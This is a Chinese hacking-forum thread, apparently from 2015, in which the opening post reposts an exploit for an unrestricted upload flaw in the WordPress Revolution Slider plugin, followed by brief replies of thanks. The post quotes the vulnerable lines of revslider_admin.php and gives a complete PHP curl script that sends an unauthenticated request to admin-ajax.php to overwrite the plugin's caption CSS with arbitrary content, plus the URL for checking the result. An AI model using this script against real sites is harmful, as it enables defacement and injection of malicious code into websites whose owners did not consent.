查看: 52420|回复: 57

Wordpress Revolution Slider插件任意上传漏洞

[复制链接]
  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2015-3-29 18:07:24 | 显示全部楼层 |阅读模式
    ######################################################################
    # Exploit Title: Wordpress Plugin Revolution Slider - Unrestricted File Upload
    # Google Dork: Y0ur Brain
    # Date: 27.03.2015
    # Exploit Author: CrashBandicot (@DosPerl)
    # Vendor HomePage: http://revolution.themepunch.com/
    # Version: old
    # Tested on: Windows
    ######################################################################
    [PHP] 纯文本查看 复制代码
    # Path of File : /wp-content/plugins/revslider/revslider_admin.php
    # Vulnerable File : revslider_admin.php
     
    232.    $action = self::getPostGetVar("client_action");
    233.    $data = self::getPostGetVar("data");
    ...
    301.    case "get_captions_css":
    302.     $contentCSS = $operations->getCaptionsContent();
    303.      self::ajaxResponseData($contentCSS);
    ...
    305.    case "update_captions_css":
    306.      $arrCaptions = $operations->updateCaptionsContentData($data);
    307.      self::ajaxResponseSuccess("CSS file saved succesfully!",array("arrCaptions"=>$arrCaptions));
     
     
    # Exploit :
     
    <?php
     
    $post = array
    (
    "action" => "revslider_ajax_action",
    "client_action" => "update_captions_css",
    "data" => "<marquee>Malicious Code Here</marquee>"
    );
      
    $ch = curl_init ("http://localhost/wp-admin/admin-ajax.php");
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
    curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
    curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt ($ch, CURLOPT_POST, 1);
    curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
    $data = curl_exec ($ch);
    curl_close ($ch);
     
    ?>
     
     
    # Path of Result : /wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
     
    回复

    使用道具 举报

  • TA的每日心情
    慵懒
    2024-12-2 09:11
  • 签到天数: 919 天

    [LV.10]以坛为家III

    发表于 2015-3-29 19:13:42 | 显示全部楼层
    看不懂这个东西
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-3-29 22:52:32 | 显示全部楼层
    老大老是整这些高端的东西,我们很看不懂啊,要不出个公开课吧
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-7-28 16:16
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2015-3-30 17:38:00 | 显示全部楼层
    感谢分享
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2017-1-11 08:26
  • 签到天数: 53 天

    [LV.5]常住居民I

    发表于 2015-3-31 09:01:32 | 显示全部楼层
    这个漏洞国外的比较多
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-3-31 22:06:00 | 显示全部楼层
    还得继续学习啊                     
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2019-4-14 17:44
  • 签到天数: 5 天

    [LV.2]偶尔看看I

    发表于 2015-6-27 22:33:59 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-29 01:58:18 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-29 04:23:34 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-29 21:20:30 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-27 05:10 , Processed in 0.025358 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部